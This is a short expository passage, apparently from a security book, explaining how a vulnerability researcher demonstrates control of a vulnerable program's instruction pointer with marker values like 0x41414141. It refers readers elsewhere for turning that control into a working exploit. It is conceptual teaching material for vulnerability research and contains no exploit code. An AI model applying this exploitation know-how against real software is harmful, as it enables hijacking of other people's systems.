To illustrate the security implications of the bugs that I found, I will discuss the steps needed to gain control of the execution flow of the vulnerable program by controlling the instruction pointer (IP) of the CPU. The instruction pointer or program counter (PC) register contains the offset in the current code segment for the next instruction to be executed.^[5] If you gain control of this register, you fully control the execution flow of the vulnerable process. To demonstrate instruction pointer control, I will modify the register to values like 0x41414141 (hexadecimal representation of ASCII “AAAA”), 0x41424344 (hexadecimal representation of ASCII “ABCD”), or something similar. So if you see EIP = 41414141 in the following chapters, it means that I’ve gained control of the vulnerable process.

Once you achieve control over the instruction pointer, there are many ways to turn it into a fully working, weaponized exploit. For more information on the process of exploit development, you can refer to Jon Erickson’s Hacking: The Art of Exploitation, 2nd edition (No Starch Press, 2008), or you can type exploit writing into Google and browse through the enormous amount of material available online.